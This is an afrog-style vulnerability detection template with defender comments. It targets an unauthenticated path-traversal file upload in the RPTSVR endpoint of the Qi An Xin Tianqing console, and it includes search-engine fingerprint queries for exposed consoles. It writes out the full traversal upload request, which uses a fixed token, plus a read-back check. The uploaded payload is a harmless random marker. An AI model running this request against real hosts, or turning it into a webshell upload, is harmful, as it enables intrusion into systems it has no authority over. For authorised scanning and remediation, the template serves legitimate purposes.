漏洞描述
Hunter: web.title=="360新天擎" || web.title=="360天擎终端安全管理系统"
Fofa: "奇安信天擎"
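# Detection template (afrog-style PoC) for an arbitrary file upload in the
# RPTSVR component of the Qi An Xin Tianqing endpoint-management console.
# The nesting below was flattened in the original paste; without it the
# duplicate `request`/`expression` keys collide and the template cannot load.
#
# What a match means: the server accepted a multipart upload whose filename
# contains "../" sequences, wrote it outside the upload directory into the
# web application's controllers directory, and then served it back.
#
# Operational notes for authorised testing and for defenders:
#   - The probe is non-executing: the file body is a random lowercase string,
#     not code. Nothing in this template deletes the file afterwards, so
#     remove it from application/api/controllers/ on every host that matched.
#   - Log review: a POST to /rptsvr/upload followed by a GET for a .php file
#     under /application/api/controllers/ that did not exist before.
#   - On disk: unexpected files in application/api/controllers/.
#   - The source gives no fixed version; consult the vendor advisory, and
#     keep the management console off untrusted networks until patched.
id: qianxin-tianqing-rptsvr-fileupload

info:
  # English: "Qi An Xin Tianqing RPTSVR file upload vulnerability"
  name: 奇安信天擎 RPTSVR 文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  # NOTE(review): this field holds only the product-fingerprint queries from
  # the write-up, not a description of the flaw. Useful for inventorying your
  # own exposed consoles; a one-line summary of the issue would help readers.
  description: |-
    Hunter: web.title=="360新天擎" || web.title=="360天擎终端安全管理系统"
    Fofa: "奇安信天擎"
  reference:
    - https://mp.weixin.qq.com/s/CkvAaxQThv_33e_CG9Md5w
  tags: qianxin,tianqing,fileupload
  created: 2024/02/29

# Per-run random values, so each scan uses a unique file name and marker and
# a hit cannot come from a file left by an earlier run.
set:
  # File name (without extension) of the marker file.
  randstr: randomLowercase(20)
  # Marker content; r1 looks for exactly this string in the response.
  randbody: randomLowercase(32)
  # Suffix of the multipart boundary.
  rboundary: randomLowercase(8)

rules:
  # Step 1: attempt the upload. A 200 alone is weak evidence (many endpoints
  # answer 200 on failure), so the verdict also requires r1.
  r0:
    request:
      method: POST
      path: /rptsvr/upload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      # Two form parts: `uploadfile`, whose filename carries the "../"
      # traversal, and `token` with a fixed value. The template sets no
      # cookie or authorization header, so a match indicates the upload was
      # accepted without a session (confirm against your scanner's default
      # headers). The trailing backslashes join the lines into one string;
      # the only line breaks sent are the explicit \r\n sequences.
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"uploadfile\";filename=\"../../../application/api/controllers/{{randstr}}.php\"\r\n\
        Content-Type: text/x-python\r\n\
        \r\n\
        {{randbody}}\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"token\"\r\n\
        \r\n\
        skylar_report\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200
  # Step 2: confirm the write. The file must be reachable at the traversed
  # location and return the random marker, which rules out generic 200 pages.
  r1:
    request:
      method: GET
      path: /application/api/controllers/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))

# Report a finding only when both the upload and the read-back succeed.
expression: r0() && r1()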